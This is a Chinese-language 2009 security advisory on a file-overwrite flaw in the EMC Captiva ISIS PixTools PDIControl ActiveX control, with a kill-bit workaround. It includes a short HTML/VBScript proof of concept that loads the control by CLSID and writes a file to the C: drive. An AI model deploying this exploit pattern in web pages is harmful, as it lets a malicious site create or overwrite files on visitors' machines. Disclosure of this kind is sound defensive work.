发布日期：2009-10-01
更新日期：2009-10-10

受影响系统：

EMC Captiva ISIS PixTools 2.2

描述：

---

BUGTRAQ  ID: 36566

EMC Captiva ISIS PixTools是一套软件开发包，包括扫描、查看和图形处理模块。

Captiva ISIS PixTools所提供的PDIControl.PDI.1 ActiveX控件（PDIControl.dll）没有正确地验证对SetLogFileName()和WriteToLog()方式所传送的参数。如果用户受骗访问了恶意网页并向上述方式传送了特制参数，就会导致在用户系统上创建或覆盖任意文件。

<*来源：shinnai （shinnai@autistici.org）
  
  链接：http://secunia.com/advisories/36896/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<object classid='clsid:00200338-3D33-4FFC-AC20-67AA234325F3' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
Sub tryMe
  test.SetLogLevel 1
  test.SetLogFileName "c:\some.txt"
  test.WriteToLog 1, "Hello World!"
End Sub
</script>

建议：

---

临时解决方法：

* 对clsid 00200338-3D33-4FFC-AC20-67AA234325F3设置kill-bit。

厂商补丁：

EMC
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.emc.com/products/storage_management/navisphere.jsp

浏览次数：2152
严重程度：0（网友投票）